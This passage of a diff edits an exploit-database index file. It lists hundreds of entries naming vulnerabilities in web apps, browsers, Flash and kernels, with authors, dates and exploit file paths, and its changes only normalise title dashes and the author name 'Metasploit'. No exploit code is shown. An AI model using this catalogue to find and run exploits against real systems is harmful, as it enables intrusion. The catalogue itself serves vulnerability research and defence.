Scripting",2012-01-01,Net.Edit0r,php,webapps,0 +36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 - 's' Parameter Cross Site Scripting",2012-01-01,"H4ckCity Security Team",php,webapps,0 +36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 - 'q' Parameter Cross Site Scripting",2011-01-01,"H4ckCity Security Team",php,webapps,0 +36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 - 'windowed' Parameter Cross Site Scripting",2012-01-02,sonyy,php,webapps,0 36486,platforms/php/webapps/36486.txt,"Tienda Virtual 'art_detalle.php' SQL Injection",2012-01-03,"Arturo Zamora",php,webapps,0 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0 36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790 -36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex",2015-03-17,metasploit,windows,remote,0 +36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex",2015-03-17,Metasploit,windows,remote,0 36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25 36783,platforms/windows/dos/36783.txt,"Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash PoC",2015-04-17,sajith,windows,dos,0 -36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,metasploit,multiple,remote,0 +36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,Metasploit,multiple,remote,0 36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On - Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection",2015-03-18,"Han Sahin",java,webapps,9447 36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 @@ -32862,18 +32862,18 @@ id,file,description,date,author,platform,type,port 36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - (.tga) Crash PoC",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 36432,platforms/php/webapps/36432.txt,"Pet Listing 'preview.php' Cross Site Scripting",2011-12-09,Mr.PaPaRoSSe,php,webapps,0 36433,platforms/windows/dos/36433.txt,"Yahoo! CD Player ActiveX Control 'open()' Method Stack Buffer Overflow",2011-04-20,shinnai,windows,dos,0 -36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 'flagshow.php' Cross Site Scripting",2011-12-12,Am!r,php,webapps,0 +36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross Site Scripting",2011-12-12,Am!r,php,webapps,0 36435,platforms/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80 36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0 -36437,platforms/windows/local/36437.rb,"Publish-It - PUI Buffer Overflow (SEH)",2015-03-19,metasploit,windows,local,0 -36438,platforms/php/remote/36438.rb,"TWiki Debugenableplugins Remote Code Execution",2015-03-19,metasploit,php,remote,80 +36437,platforms/windows/local/36437.rb,"Publish-It - PUI Buffer Overflow (SEH)",2015-03-19,Metasploit,windows,local,0 +36438,platforms/php/remote/36438.rb,"TWiki Debugenableplugins Remote Code Execution",2015-03-19,Metasploit,php,remote,80 36439,platforms/php/webapps/36439.txt,"Joomla ECommerce-WD Plugin 1.2.5 - SQL Injection Vulnerabilities",2015-03-19,"Brandon Perry",php,webapps,80 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443 36442,platforms/linux/webapps/36442.txt,"Citrix NITRO SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0 36443,platforms/windows/dos/36443.txt,"Opera Web Browser Prior to 11.60 - Multiple Denial of Service and Unspecified Vulnerabilitiies",2011-12-12,anonymous,windows,dos,0 36444,platforms/php/webapps/36444.txt,"WordPress flash-album-gallery Plugin 'flagshow.php' Cross Site Scripting",2011-12-13,Am!r,php,webapps,0 -36445,platforms/php/webapps/36445.txt,"WordPress The Welcomizer Plugin 1.3.9.4 'twiz-index.php' Cross Site Scripting",2011-12-31,Am!r,php,webapps,0 +36445,platforms/php/webapps/36445.txt,"WordPress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross Site Scripting",2011-12-31,Am!r,php,webapps,0 36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 Multiple Cross Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0 36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0 36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 modules/Documents/version_list.php parent_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 @@ -32888,8 +32888,8 @@ id,file,description,date,author,platform,type,port 36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 Triton Report Management Interface Cross Site Scripting",2011-12-15,"Ben Williams",cgi,webapps,0 36458,platforms/cgi/webapps/36458.txt,"Websense 7.6 Triton 'ws_irpt.exe' Remote Command Execution",2011-12-15,"Ben Williams",cgi,webapps,0 36459,platforms/cgi/webapps/36459.txt,"Websense 7.6 Products 'favorites.exe' Authentication Bypass",2011-12-15,"Ben Williams",cgi,webapps,0 -36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 'rub' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 -36461,platforms/php/webapps/36461.txt,"Social Network Community 2 'userID' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 +36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 - 'rub' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 +36461,platforms/php/webapps/36461.txt,"Social Network Community 2 - 'userID' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 36462,platforms/php/webapps/36462.txt,"Video Community Portal 'userID' Parameter SQL Injection",2011-12-18,Lazmania61,php,webapps,0 36463,platforms/php/webapps/36463.txt,"Telescope <= 0.9.2 - Markdown Persistent XSS",2015-03-21,shubs,php,webapps,0 36464,platforms/php/webapps/36464.txt,"Joomla Spider FAQ Component - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 @@ -32897,7 +32897,7 @@ id,file,description,date,author,platform,type,port 36466,platforms/php/webapps/36466.txt,"WordPress Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e 'page_info_message' Parameter Cross Site Scripting",2011-12-19,G13,php,webapps,0 36469,platforms/php/webapps/36469.txt,"Joomla! 'com_tsonymf' Component 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 -36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware <= 8.1 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0 +36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware <= 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0 36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-12-20,"High-Tech Bridge SA",php,webapps,0 36472,platforms/php/webapps/36472.txt,"Joomla! 'com_caproductprices' Component 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' Parameter SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0 @@ -32908,18 +32908,18 @@ id,file,description,date,author,platform,type,port 36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload",2015-03-24,KedAns-Dz,php,webapps,0 36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0 36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0 -36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 'domain' Parameter Cross Site Scripting",2012-01-03,Atmon3r,php,webapps,0 -36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 +36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross Site Scripting",2012-01-03,Atmon3r,php,webapps,0 +36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0 36492,platforms/php/webapps/36492.txt,"GraphicsClone Script 'term' parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 -36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 'ReturnUrl' Parameter URI Redirection",2012-01-04,"Mesut Timur",php,webapps,0 -36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 'login.php' Script Cross Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0 -36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0 +36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Parameter URI Redirection",2012-01-04,"Mesut Timur",php,webapps,0 +36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0 +36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0 36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross Site Scripting",2011-12-29,SiteWatch,php,webapps,0 36497,platforms/php/webapps/36497.txt,"UBB.threads 7.5.6 'Username' Field Cross Site Scripting",2012-01-04,sonyy,php,webapps,0 36498,platforms/php/webapps/36498.txt,"Yaws 1.88 - Multiple Cross Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 -36499,platforms/php/webapps/36499.txt,"StatIt 4 'statistik.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 +36499,platforms/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 Directory Traversal",2012-01-05,demonalex,windows,remote,0 36501,platforms/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 @@ -32927,7 +32927,7 @@ id,file,description,date,author,platform,type,port 36504,platforms/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0 36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager - Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0 36507,platforms/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module Security Bypass",2012-01-10,"Adi Cohen",windows,remote,0 -36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 'extensions.php' Script Cross Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 +36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 - 'extensions.php' Script Cross Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 36509,platforms/php/webapps/36509.txt,"SQLiteManager 1.2.4 main.php dbsel Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 36510,platforms/php/webapps/36510.txt,"SQLiteManager 1.2.4 index.php Multiple Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 36511,platforms/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 HTML Injection",2012-12-27,"Vulnerability Research Laboratory",hardware,remote,0 @@ -32958,18 +32958,18 @@ id,file,description,date,author,platform,type,port 36536,platforms/php/webapps/36536.txt,"MARINET CMS gallery.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36537,platforms/multiple/remote/36537.txt,"SonicWall AntiSpam & EMail 7.3.1 Multiple Security vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",multiple,remote,0 36538,platforms/php/webapps/36538.txt,"Gregarius <= 0.6.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-01-09,sonyy,php,webapps,0 -36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 'users.php' Cross Site Scripting",2012-01-09,Am!r,php,webapps,0 -36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 'redirect_to' Parameter URI Redirection",2012-01-10,"Gianluca Brindisi",php,webapps,0 -36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 'downloads.php' Cross Site Scripting",2012-01-10,Am!r,php,webapps,0 +36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 - 'users.php' Cross Site Scripting",2012-01-09,Am!r,php,webapps,0 +36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 - 'redirect_to' Parameter URI Redirection",2012-01-10,"Gianluca Brindisi",php,webapps,0 +36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 - 'downloads.php' Cross Site Scripting",2012-01-10,Am!r,php,webapps,0 36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x - Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0 36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 - KVM Local Denial of Service",2011-12-29,"Stephan Sattler",linux,dos,0 36546,platforms/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double Free Remote Memory Corruption",2012-01-12,NCNIPC,windows,remote,0 -36547,platforms/asp/webapps/36547.txt,"MailEnable <= 6.02 'ForgottonPassword.aspx' Cross Site Scripting",2012-01-12,"Sajjad Pourali",asp,webapps,0 +36547,platforms/asp/webapps/36547.txt,"MailEnable <= 6.02 - 'ForgottonPassword.aspx' Cross Site Scripting",2012-01-12,"Sajjad Pourali",asp,webapps,0 36548,platforms/java/webapps/36548.txt,"Contus Job Portal 'Category' Parameter SQL Injection",2012-01-13,Lazmania61,java,webapps,0 -36549,platforms/php/webapps/36549.txt,"Joomla! HD Video Share Component 1.3 'id' Parameter SQL Injection",2012-01-12,Lazmania61,php,webapps,0 -36550,platforms/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 'index.php' Cross Site Scripting",2012-01-16,Atmon3r,php,webapps,0 +36549,platforms/php/webapps/36549.txt,"Joomla! HD Video Share Component 1.3 - 'id' Parameter SQL Injection",2012-01-12,Lazmania61,php,webapps,0 +36550,platforms/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 - 'index.php' Cross Site Scripting",2012-01-16,Atmon3r,php,webapps,0 36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website 'ringtones.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 @@ -32994,7 +32994,7 @@ id,file,description,date,author,platform,type,port 36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0 36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0 36739,platforms/osx/local/36739.m,"Apple MAC OS X < 10.9/10 - Local Root Exploit",2015-04-13,mu-b,osx,local,0 -36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,metasploit,windows,remote,0 +36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,Metasploit,windows,remote,0 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent XSS",2015-03-31,"Michael Hendrickx",windows,webapps,0 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80 36582,platforms/php/webapps/36582.txt,"OneOrZero AIMS 'index.php' Cross Site Scripting",2012-01-18,"High-Tech Bridge SA",php,webapps,0 @@ -33041,11 +33041,11 @@ id,file,description,date,author,platform,type,port 36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 index.php sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 index.php getParam() Function Multiple Parameter XSS",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final Cross Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0 -36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 'vba_cmps_include_bottom.php' Remote File Include",2012-01-25,PacketiK,php,webapps,0 +36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Include",2012-01-25,PacketiK,php,webapps,0 36629,platforms/php/webapps/36629.txt,"Joomla! 'com_motor' Component 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component Multiple SQL Injection Vulnerabilities",2012-01-26,the_cyber_nuxbie,php,webapps,0 -36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x 'border' Parameter Cross Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 -36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x 'shopping_url' Parameter Cross Site Scripting",2012-01-26,sonyy,php,webapps,0 +36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 +36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross Site Scripting",2012-01-26,sonyy,php,webapps,0 36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0 36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities",2012-01-28,the_cyber_nuxbie,php,webapps,0 36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 @@ -33065,19 +33065,19 @@ id,file,description,date,author,platform,type,port 36650,platforms/php/webapps/36650.txt,"OpenEMR <= 4.1 contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36651,platforms/php/webapps/36651.txt,"OpenEMR <= 4.1 interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot Remote Code Execution PoC Exploit",2015-04-06,"Jay Turla",multiple,remote,6667 -36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 File Upload and Execute",2015-04-06,metasploit,jsp,remote,8080 -36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 'base' Parameter Cross Site Scripting",2012-02-01,andsarmiento,php,webapps,0 -36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 'server_id' Parameter Cross Site Scripting Vulnerabilities",2012-02-01,andsarmiento,php,webapps,0 +36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 File Upload and Execute",2015-04-06,Metasploit,jsp,remote,8080 +36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross Site Scripting",2012-02-01,andsarmiento,php,webapps,0 +36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross Site Scripting Vulnerabilities",2012-02-01,andsarmiento,php,webapps,0 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 Multiple Cross Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component 'seccion_id' Parameter Remote SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0 36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module Cross Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0 36659,platforms/php/webapps/36659.txt,"Joomla! Currency Converter Component 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0 -36660,platforms/php/webapps/36660.txt,"project-open 3.4.x 'account-closed.tcl' Cross Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0 -36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0 +36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0 +36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0 36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0 -36663,platforms/linux/remote/36663.txt,"Apache HTTP Server <= 2.2.15 'mod_proxy' Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0 +36663,platforms/linux/remote/36663.txt,"Apache HTTP Server <= 2.2.15 - 'mod_proxy' Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0 36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 'getid3.php' Local File Include",2012-02-06,T0x!c,php,webapps,0 -36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 'export' Parameter Cross Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0 +36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Parameter Cross Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0 36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 DomainConfig.do operation Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0 36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 jsp/AddDC.jsp domainName Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0 36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross Site Scripting",2012-02-07,"Chokri B.A",php,webapps,0 @@ -33091,11 +33091,11 @@ id,file,description,date,author,platform,type,port 36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 36677,platforms/php/webapps/36677.txt,"WordPress Traffic Analyzer Plugin 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 36678,platforms/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",jsp,webapps,0 -36679,platforms/windows/remote/36679.rb,"Solarwinds Firewall Security Manager 6.6.5 - Client Session Handling",2015-04-08,metasploit,windows,remote,0 +36679,platforms/windows/remote/36679.rb,"Solarwinds Firewall Security Manager 6.6.5 - Client Session Handling",2015-04-08,Metasploit,windows,remote,0 36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0 36681,platforms/multiple/remote/36681.txt,"Apache MyFaces 'ln' Parameter Information Disclosure",2012-02-09,"Paul Nicolucci",multiple,remote,0 36682,platforms/php/dos/36682.php,"PHP PDORow Object Remote Denial Of Service",2011-09-24,anonymous,php,dos,0 -36683,platforms/php/webapps/36683.txt,"Dolibarr 3.x 'adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",php,webapps,0 +36683,platforms/php/webapps/36683.txt,"Dolibarr 3.x - 'adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",php,webapps,0 36684,platforms/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,java,webapps,0 36685,platforms/php/webapps/36685.txt,"CubeCart <= 3.0.20 Multiple Script redir Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36686,platforms/php/webapps/36686.txt,"CubeCart <= 3.0.20 admin/login.php goto Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 @@ -33153,8 +33153,8 @@ id,file,description,date,author,platform,type,port 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0 36743,platforms/linux/dos/36743.c,"Linux Kernel <= 3.13 / <= 3.14 (Ubuntu) - splice() System Call Local DoS",2015-04-13,"Emeric Nasi",linux,dos,0 -36744,platforms/windows/remote/36744.rb,"Adobe Flash Player casi32 Integer Overflow",2015-04-13,metasploit,windows,remote,0 -36745,platforms/osx/local/36745.rb,"Mac OS X - 'Rootpipe' Privilege Escalation",2015-04-13,metasploit,osx,local,0 +36744,platforms/windows/remote/36744.rb,"Adobe Flash Player casi32 Integer Overflow",2015-04-13,Metasploit,windows,remote,0 +36745,platforms/osx/local/36745.rb,"Mac OS X - 'Rootpipe' Privilege Escalation",2015-04-13,Metasploit,osx,local,0 36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 @@ -33208,11 +33208,11 @@ id,file,description,date,author,platform,type,port 36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,linux,remote,0 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0 36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 -36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,metasploit,windows,remote,0 -36809,platforms/php/remote/36809.rb,"WordPress Reflex Gallery Upload",2015-04-21,metasploit,php,remote,80 -36810,platforms/php/remote/36810.rb,"WordPress N-Media Website Contact Form Upload",2015-04-21,metasploit,php,remote,80 -36811,platforms/php/remote/36811.rb,"WordPress Creative Contact Form Upload",2015-04-21,metasploit,php,remote,80 -36812,platforms/php/remote/36812.rb,"WordPress Work The Flow Upload",2015-04-21,metasploit,php,remote,80 +36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,Metasploit,windows,remote,0 +36809,platforms/php/remote/36809.rb,"WordPress Reflex Gallery Upload",2015-04-21,Metasploit,php,remote,80 